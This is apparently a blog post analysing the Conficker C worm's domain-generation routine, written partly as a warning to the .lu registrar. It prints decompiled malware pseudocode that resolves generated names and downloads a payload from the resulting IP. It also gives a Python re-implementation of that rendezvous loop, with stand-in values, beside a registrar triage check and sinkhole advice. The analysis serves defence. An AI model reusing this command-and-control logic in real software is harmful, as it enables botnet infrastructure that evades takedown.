For those not in the know: Conficker is one of the largest worm botnets in existence, and Conficker is also the name given to the piece of malware used to build that botnet.

Conficker C uses a PRNG to generate a list of possible rendezvous points: in essence, domain names (hosts) from which additional information and code are downloaded. After the "fiasco" of having all of their pseudo-randomly generated domain names registered or blocked, the new Conficker C variant improved on the design. Conficker C now generates 50,000 candidate names per day and appends one of 116 TLD suffixes to each.

Update: Conficker disinfection, network scanners and more

Interestingly, the Luxembourg (LU) domain is also among the possible TLDs. It will be interesting to see whether it gets used and how Restena (the main registrar) will react. My guess is that they will most likely not succeed in getting their LU domain, since the back-end process is entirely manual (afaik).

So if somebody from Restena is reading this post: if you get a request to register a random domain name like yxsdsdfsfd.lu, you should react by informing your 2nd-tier registrar that something might be fishy (an appropriate word in this case) and manually verify a contact name and phone number prior to handing out the domain.
PS: Having not seen the PRNG, it might be totally possible that a more meaningful domain than random characters is generated once in a while.
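A triage check of the kind the paragraph above asks a registrar to perform, written here as an added example (it is not Restena's process and not code from the original post): it flags .lu requests whose label has the Conficker C name shape and looks random, so a human can verify the contact before the name is handed out. The shape (one label of lowercase letters, 4 to 9 long) follows the routine's length formula and suffix append; the a-z alphabet, the vowel/consonant-run heuristic, the upper length bound widened by one, and the tiny wordlist are assumptions.

```python
"""Registrar-side triage for .lu registration requests (added example)."""
import re

VOWELS = set("aeiou")                      # assumption: y is treated as a consonant

# 4..9 letters per the routine's "random % 6 + 4"; the upper bound is widened
# by one as a safety margin (assumption, not something the routine shows).
DGA_SHAPE = re.compile(r"^([a-z]{4,10})\.lu$")

# Constructed stand-in for a real dictionary / brand list.
KNOWN_WORDS = {"hotel", "luxembourg", "radio", "restena"}


def max_consonant_run(label):
    """Longest run of consecutive consonants in the label."""
    run = best = 0
    for ch in label:
        run = 0 if ch in VOWELS else run + 1
        best = max(best, run)
    return best


def looks_random(label):
    """Heuristic (assumption): almost no vowels, or a long consonant run."""
    vowel_ratio = sum(ch in VOWELS for ch in label) / len(label)
    return vowel_ratio < 0.2 or max_consonant_run(label) >= 4


def triage(requested_name):
    """Return 'manual-verify' for a request that has the DGA shape and a
    random-looking label, 'ok' otherwise.  Requests outside the shape
    (hyphens, digits, other TLDs, longer labels) are not the Conficker C
    pattern and pass through."""
    m = DGA_SHAPE.match(requested_name.strip().lower())
    if not m:
        return "ok"
    label = m.group(1)
    if label in KNOWN_WORDS:
        return "ok"
    return "manual-verify" if looks_random(label) else "ok"


if __name__ == "__main__":
    # Constructed sample of incoming requests.
    for name in ("yxsdsdfsfd.lu", "qazepltmk.lu", "hotel.lu", "telora.lu", "yxsd-sdfs.lu"):
        print(name, "->", triage(name))
```

The last sample, telora.lu, is the PS caveat in code: a generated label that happens to be pronounceable passes the heuristic, so this screens the obvious cases only and does not replace matching requests against the day's actual list once the PRNG is known.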


More information: Excellent technical background about Conficker C from SRI

The decompiled pseudocode of the domain-name generation routine is:


int domain_name_generation()
{
    // local declarations
    hMem = 0;
    check_if_MS_DEF_PROV();
    get_time_from_popular_web_sites();
    // baidu.com, google.com, yahoo.com, ask.com, w3.org,
    // facebook.com, imageshack.us, rapidshare.com

    hMem = GlobalAlloc(0x40u, 0x30D40u);    // global array - 50,000 random names
    if ( hMem )
    {
        while ( 1 )
        {
            counter_domains = counter;
            if ( counter >= 50000 )
                break;

            size_of_name = DGA_random_function() % 6 + 4;
            // size of domain name is between 4 and 9 chars (random % 6 gives 0..5)

            // append "." at the end of the name
            random = DGA_random_function();
            strcat(*end_of_random_name, (&array_top_domains)[4 * random % 116]);
            // append to the name one of the 116 TLD suffixes
            ++counter;
        }

        // select and query 500 domains
        counter_domains = 0;
        while ( !success_download && counter_domains < 500 )
        {
            // random number modulo 50,000
            one_in_50000_names = conficker_D_PRNG_function() % 50000;
            hostent = gethostbyname(one_in_50000_names);
            // resolve name to a set of IP addresses
            if ( hostent )
            {
                host_address = hostent->address_list;   // get list of IPs
                array_previously_checked_IPs[counter_domains] = host_address;

                if ( *host_address )
                {
                    // skip if domain name resolves to multiple IP addresses
                    if ( !*(host_address + 1) )
                    {
                        // skip if IP is local host or other trivial IPs
                        if ( check_IP_value(host_address) )
                        {
                            is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
                            // skip if IP is blacklisted
                            if ( !is_blacklisted_ip )
                            {
                                found = 0;
                                index = 0;
                                while ( index < counter_domains )
                                {
                                    if ( host_address == array_previously_checked_IPs[index] )
                                    {
                                        found = 1;
                                        break;  // break if IP has been previously encountered
                                    }
                                    ++index;
                                }
                                // skip if IP has been previously encountered
                                if ( !found )
                                {
                                    snprintf(Dest, 0x80u, "http://%s", host_address);
                                    success_download = download_and_validate_file(Dest);
                                    // HTTP request to the IP address and download of a valid file
                                }
                            }
                        }
                    }
                }
            }
            Sleep(...);     // sleep small random amount
            ++counter_domains;
        }
    }
    GlobalFree(hMem);
    return success_download;
}
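The same two loops in Python, added here as an example to make the selection and filtering logic testable; this is not Conficker C's code. Everything the listing above does not give is a constructed stand-in and labelled as such: random.Random replaces the malware's DGA_random_function and conficker_D_PRNG_function, eight suffixes stand in for the 116, the alphabet is assumed to be a-z, the ranges behind check_IP_value and check_if_IP_is_in_ranges are guesses, and the DNS answers and download validator are fed in as a dict and a callback. It goes one step beyond the listing by returning a verdict per queried name, so the effect of each filter can be seen.

```python
"""Re-implementation of Conficker C's rendezvous selection loop (added example)."""
import ipaddress
import random
from collections import Counter

ALPHABET = "abcdefghijklmnopqrstuvwxyz"                       # assumption
TLDS = ["lu", "com", "net", "org", "info", "biz", "ws", "cc"]  # stand-ins for the 116
# Assumed contents of check_IP_value ("local host or other trivial IPs").
TRIVIAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "169.254.0.0/16", "224.0.0.0/4", "255.255.255.255/32")]
# Constructed stand-in for the ranges behind check_if_IP_is_in_ranges.
BLACKLISTED_NETS = [ipaddress.ip_network("203.0.113.0/24")]


def generate_candidates(seed, count=50000, tlds=TLDS):
    """First loop: 'count' labels of 4..9 letters, each with one suffix appended."""
    rng = random.Random(seed)                 # stand-in for DGA_random_function
    names = []
    for _ in range(count):
        size = rng.randrange(2 ** 32) % 6 + 4  # 4..9, exactly as in the routine
        label = "".join(rng.choice(ALPHABET) for _ in range(size))
        names.append(label + "." + tlds[rng.randrange(2 ** 32) % len(tlds)])
    return names


def classify(addrs, seen_ips):
    """Second loop's filters, in the routine's order.  'addrs' is the list of
    A records for one name; 'seen_ips' the first IP of every earlier answer.
    Returns (verdict, ip_to_contact_or_None)."""
    if not addrs:
        return "no-answer", None
    if len(addrs) > 1:                        # !*(host_address + 1) fails
        return "multiple-ips", None
    ip = ipaddress.ip_address(addrs[0])
    if any(ip in net for net in TRIVIAL_NETS):
        return "trivial-ip", None
    if any(ip in net for net in BLACKLISTED_NETS):
        return "blacklisted-ip", None
    if str(ip) in seen_ips:
        return "duplicate-ip", None
    return "candidate", str(ip)


def select_rendezvous(names, resolver, fetch, seed=0, max_queries=500):
    """Try up to 500 random picks from the day's list; stop at the first name
    whose download validates.  'resolver' maps name -> A records (constructed),
    'fetch(url)' stands in for download_and_validate_file."""
    rng = random.Random(seed)                 # stand-in for conficker_D_PRNG_function
    seen, log = [], []
    for _ in range(max_queries):
        name = names[rng.randrange(len(names))]
        addrs = resolver.get(name, [])
        verdict, ip = classify(addrs, seen)
        if addrs:                             # recorded even when the name is skipped,
            seen.append(str(ipaddress.ip_address(addrs[0])))  # as array_previously_checked_IPs is
        if verdict == "candidate":
            url = "http://%s" % ip            # the request goes to the IP, not the name
            if fetch(url):
                log.append((name, "download-ok"))
                return name, log
            verdict = "download-failed"
        log.append((name, verdict))
    return None, log


if __name__ == "__main__":
    names = generate_candidates(seed=20090401)
    # Constructed DNS answers for 4% of the day's names: a sinkhole answering
    # with two records, a loopback answer, a blacklisted host and one usable host.
    resolver = {}
    for n in names[:500]:
        resolver[n] = ["198.51.100.10", "198.51.100.11"]
    for n in names[500:1000]:
        resolver[n] = ["127.0.0.1"]
    for n in names[1000:1500]:
        resolver[n] = ["203.0.113.7"]
    for n in names[1500:2000]:
        resolver[n] = ["198.51.100.12"]
    winner, log = select_rendezvous(names, resolver, fetch=lambda u: u == "http://198.51.100.12")
    print("rendezvous:", winner)
    print(Counter(verdict for _, verdict in log))
```

Read as a defender, the filters say what a sinkhole for these names has to look like: it must answer with exactly one A record, that address must lie outside the trivial and blacklisted ranges, it must not already have been returned for another name in the same run, and the payload is requested as http://<ip>/ with no hostname, so the sinkhole's web server cannot rely on name-based virtual hosting.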
